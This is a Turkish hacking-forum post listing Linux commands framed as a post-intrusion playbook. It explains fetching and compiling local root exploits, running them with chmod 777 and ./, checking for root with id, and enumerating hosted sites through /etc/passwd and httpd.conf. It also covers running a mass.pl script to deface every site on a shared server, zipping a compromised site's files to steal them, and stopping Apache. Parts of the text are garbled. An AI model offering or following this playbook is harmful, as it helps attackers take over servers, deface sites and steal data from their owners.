THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Linux Root Komutları

seydahmet - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
01/2016
Mesajlar:
83
Konular:
17
Teşekkür (Etti):
10
Teşekkür (Aldı):
39
Ticaret:
(0) %
06-01-2016 02:22
#1
Linux Root Komutları
Chmod = Dosyaya yazım izinleri vermeye yarayan komutumuzdur. Genelde Exploite yazma izni vererek kullanılabilir hale gelmesini sağlar. Örneğin : Chmod 777 dosya ısmı

wget = Bulunulan dizine dosya çekmeye yarar. Genelde index.html ve exploit cekmek için kullanırız. Örneğin : wget http://127.0.01./wp/

cd = Bu komut ile klasorler arası geçişi sağlarız. Örneğin : cd /tmp komutu tmp klasorune gitmeye yarar. Genellikle yazma izni olan klasorlere geçiş yapmak için kullanılır.

pwd = Bu komut ile şuan da bulunduğumuz klasoru öğrenebilirz.

ls -l = Bu komut bulunduğumuz klasordeki dosyaları listeler.

rm -rf = Bu komut ile dizinde bulunan dosyayı silebiliriz. Örneğin : rm -f index.html

perl = perl komutu dizinde bulunan exploiti calıstırmaya yarar. Örneğin : perl mass.pl komutu ile mass.pl adlı exploiti aktif hale gecirerek mass attack yapmış oluruz.

./ = Bu komut ise yazma izni verdiğimiz local exploitimizi calıstırmaya yarar. Chmod 777 localexploitadı ndan sonra kullanacagımız komut. Örneğin : ./RooT

id = Bu komut ise serverda ki yetkimiz hakkında bilgi verir. id yazdığımızda Uid(root) ile başlayan bir satır görüyorsak sunucunun root’u yani sahibi olmuşuz demektir.

uname -a = Bu komut sunucunun bilgilerini verir, Kernel versionunu bu komut ile öğrenerek gerekli localexploiti cekebiliriz…
Serverın list dızınını almak:

cd etc
cd apache, apache2, httpd bu 3 klasorden bırı wardır deneyerek bulucaksınız

ls -la yaptıgınızda genelde eskı serverlarda httpd.conf vardır ki bunu

cat httpd.conf | grip ServerName yazıp sıte lıstı alınırdı…
Mass.pl yı calıstırmak
perl mass.pl /indexinuploadoldugudizin/indexadı.htm
ornek:
perl mass.pl /home/SnL_ynr_/public_html/index.htm
ben genelde ındexi tmp ye atarım ordan cekmesı daha kolay oluyo sız bılırsınız yınede selametle

zip -r zipadı klasöradı —-> Dosya Zipleme
Bu komut sayesinde site yedeğinizi hızlı bir şekilde alabilirsiniz yada kötü amaçla kullanmak isterseniz ftpsini ele geçirdiğiniz bir sitenin tüm dosyalaryny çalabilirsiniz.
unzip zipadı —-> Zipli Dosyayı Açma
Bu komut ile site yede?inizi yada zip şeklinde upload ettiğiniz portal,forum,resim vs saniyeler içinde hızlyca serverın içinde açabilirsiniz.

cat etc/passwd —-> Passwd Okuma
Hostun passwd dosyasını okuyarak serverdaki sitelerin klasör isimlerini ögrenmenize yarar.Böylelikle klasör değiştirerek (fopen) komutunun yasaklanmamış ve permissonların 777 olması gerekiyor.

cat etc/password —-> Passwd Okuma
Üstteki passwd dosyasının ismini bazı hostlar password olarak değiştirdiği için koydum.

cat etc/hosts —-> Hosts Okuma
Host üzerindeki tüm site isimlerinin tutulduğu dosya.
cat etc/host —-> Hosts Okuma
Üstteki hosts dosyasynyn ismini bazy hostlar host olarak değiştirdiği için koydum.

wget -m site.com —-> Tüm siteyi çekmek
Bu komut sayesinde tüm siteyi kolaylykla kendi serverynyza çekebilirsiniz.(NOThp ve asp dosyalary çekmeye çalıimayın çünkü htmlye yansıyan görüntüsünü alırsnız.)Zip rar mp3 vs çekmede 1 e 1

wget dosya.uzantı —-> Dosya Çekmek
Yukardaki komutun sadece dosya çekmesini sa?layan hali.

ls- la —-> Dosya Listeleme
Basit klasör listelemenizi sağlar.
gcc exploit.c -o dosya —-> Exploit Derleme
Exploit derleme komutu
unzip zipadı —-> Zipli Dosyayı Açma
Bu komut ile site yedeginizi yada zip şeklinde upload ettiğiniz portal,forum,resim vs saniyeler içinde hızlıca serverın içinde açabilirsiniz.
Exploit derleme komutu
Service Mysqld Restart:Mysql Restart Atar
Service Httpd Restart :Apachiye Restart Atar
Service Httpd Stop :Sitelere Ulaşimi Kapatir
HACKERTHT Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler